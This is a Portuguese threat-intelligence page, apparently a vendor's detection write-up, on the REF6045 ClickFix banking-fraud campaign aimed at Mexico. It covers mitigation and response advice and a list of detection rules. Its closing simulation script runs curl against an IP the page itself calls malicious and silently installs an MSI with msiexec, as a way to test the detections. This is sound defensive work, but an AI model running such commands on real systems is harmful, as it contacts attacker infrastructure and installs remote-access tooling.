ClickFix para Sacar Dinheiro: Analisando um Kit de Fraude Bancária Mexicano
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
REF6045 é uma campanha de fraude bancária assistida por operador, focada no setor financeiro mexicano. Utiliza um método de entrega estilo ClickFix com páginas CAPTCHA falsas para convencer as vítimas a executarem comandos maliciosos do PowerShell. Após a infecção, o toolkit SCMBANKER permite que operadores humanos observem sessões bancárias, capturem capturas de tela, alterem o conteúdo da área de transferência e implantem o RAT Remote Utilities para controle remoto total.
Investigação
Laboratórios de Segurança da Elastic descobriram a ameaça após detectar atividades suspeitas bitsadmin baixando scripts do PowerShell de um diretório aberto. A investigação expôs todo o toolkit por meio de um arquivo web-root acessível publicamente, zkt.zip, e revelou grandes falhas de segurança operacional, incluindo editores de arquivos não autenticados e diretórios abertos na infraestrutura de comando e controle. A análise também mostrou que o toolkit contém extensos artefatos gerados por IA em sua base de código.
Mitigação
As organizações devem limitar o uso do PowerShell e bitsadmin a usuários aprovados e aplicar controles rigorosos de execução. Os usuários devem ser treinados para identificar iscas de engenharia social, como prompts CAPTCHA falsos ou telas de atualização do Windows falsas. As equipes de segurança também devem implantar forte monitoramento para mudanças suspeitas no registro e instalação não autorizada de software de acesso remoto.
Resposta
Se essa atividade for detectada, isole imediatamente os sistemas afetados para interromper a comunicação de comando e controle e possível roubo de dados. Conduza uma investigação forense para determinar o escopo do comprometimento e verifique a presença de Remote Utilities ou modificações não autorizadas no registro. Redefina as senhas de todas as contas financeiras e outras contas sensíveis acessadas a partir das máquinas afetadas.
Fluxo de Ataque
Detecções
MsiExec Acionado por Processo Shell (via linha de comando)
Ver
Execução do Attrib para Ocultar Arquivos (via linha de comando)
Ver
Arquivos Suspeitos no Perfil de Usuário Público (via evento de arquivo)
Ver
Possibilidade de Execução por meio de Linhas de Comando do PowerShell Ocultas (via linha de comando)
Ver
Desligamento Usado Para Forçar Parada ou Reinício do Sistema (via linha de comando)
Ver
LOLBAS Bitsadmin (via linha de comando)
Ver
Possível Comportamento de Execução Atrasada (via linha de comando)
Ver
Possível Enumeração/Manipulação de Conta ou Grupo (via linha de comando)
Ver
Microsoft Edge Iniciando Processo Incomum (via linha de comando)
Ver
Uso Suspeito do CURL (via linha de comando)
Ver
Local de Execução de Executável/Script Suspeito via [cmd.exe /C] (via linha de comando)
Ver
Detecção da Instalação do SCMBANKER e Remote Utilities [Criação de Processo do Windows]
Ver
Detecção de Atividade do Toolkit SCMBANKER [Windows Powershell]
Ver
Execução de Simulação
Pré-requisito: A Verificação Pré-voo de Telemetria & Baseline deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa de Ataque & Comandos: O adversário visa estabelecer uma base no sistema alvo imitando o padrão de fraude bancária REF6045. Primeiro, eles tentam baixar um arquivo de validação de um endereço IP malicioso hardcoded (
68.211.161.46) usandocurlcom a flag-k(insegura) para ignorar a validação do certificado SSL. Após o download, o adversário executa uma instalação silenciosa de uma ferramenta de acesso remoto maliciosa usandomsiexec.execom a flag/i(instalação) e/quiet(silencioso) switches, visando um arquivo chamadohosts.msi. Isso lhes fornece acesso remoto persistente enquanto minimiza a interação do usuário. -
Script de Teste de Regressão:
# Script de Simulação para TTPs REF6045 # Este script imita as linhas de comando específicas definidas na regra de detecção. $WorkDir = "$env:TEMPSimulation" if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir } Set-Location $WorkDir Write-Host "[+] Etapa 1: Simulando Transferência de Ferramenta de Ingress via curl..." -ForegroundColor Cyan # Nota: Usando um arquivo falso via curl para evitar tráfego malicioso real, # mas mantendo a exata string de linha de comando necessária para a detecção. cmd /c curl -k https://68.211.161.46/validation.txt Write-Host "[+] Etapa 2: Simulando Instalação Silenciosa de MSI..." -ForegroundColor Cyan # Crie um arquivo MSI fictício para que o msiexec não dê erro imediatamente (embora a regra seja acionada na linha de comando) # Apenas para testar a lógica de detecção (a linha de comando), # executaremos a exata string de comando. msiexec /i "hosts.msi" /quiet /norestart -
Comandos de Limpeza:
# Script de limpeza para remover artefatos $WorkDir = "$env:TEMPSimulation" if (Test-Path $WorkDir) { Remove-Item -Recurse -Force $WorkDir Write-Host "[+] Limpeza concluída: $WorkDir removido." -ForegroundColor Green } else { Write-Host "[!] Limpeza ignorada: Diretório não encontrado." -ForegroundColor Yellow }